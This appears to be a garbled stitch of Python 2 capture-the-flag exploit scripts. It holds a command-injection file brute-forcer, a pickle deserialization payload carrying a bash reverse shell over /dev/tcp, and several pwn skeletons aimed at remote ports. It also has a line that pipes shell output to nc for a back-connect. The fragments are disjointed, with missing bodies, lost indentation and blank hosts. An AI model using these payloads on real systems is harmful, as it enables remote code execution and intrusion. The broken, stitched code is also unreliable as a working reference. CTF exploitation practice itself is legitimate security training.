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import requests
cmd ='printf "%s|" /*'
# cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3'
for i in xrange(400):
a = requests.get('`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;')
print chr(int(a.text.split(" ")[1].split("}")[0])),
for fd in xrange(100):
import urllib, urllib2
import pickle
url = ''
shell = "cos\nsystem\n(S'bash -i >& /dev/tcp/ 0>&1'\ntR."
tmp = url + urllib.quote_plus(shell)
req = urllib2.urlopen(tmp)
import urllib, urllib2
import string
import socket
url = ''
flag = ''
regex_fail = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyX'
i = 1
charset = string.letters + string.digits + '_'
while 1:
# Author : peternguyen
from Pwn import *
import time
def exploit():
# raw_input('Debug>')
while 1:
# Author : peternguyen
from Pwn import *
import time
from capstone import *
p = Pwn(host='',port=1337)
def xor(msg):
# Author : peternguyen
from Pwn import *
import time
# p = Pwn(host='',port=1337)
# p = Pwn(port=1337)
def exploit():
cmd = 'cat flag.txt >&4;ls -lia >&4;'
__author__ = 'yeuchimse'
import struct
FileMode = ['rb', 'wb', 'ab', 'r+b', 'w+b', 'a+b']
Registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'esp', 'ebp']
# region ...
def format_code(v):
from Pwn import *
import string
p = Pwn(mode=1,host='',port=4003)
def find_index_flag():
p.read_until('Remember: send us your hex-encoded flag.\r\n')
last = 0xff # -2
from Pwn import *
p = Pwn(mode=1,host='',port=4001)
def add_node(nid,content):
p.read_until('Please choose an option :')
p.read_until('Please give me an id:')
from Pwn import *
p = Pwn(host='',port=24242)
# p = Pwn(port=24242)
def exploit():
shell = raw_input('> ')
back_connect = shell + ' | nc 8001'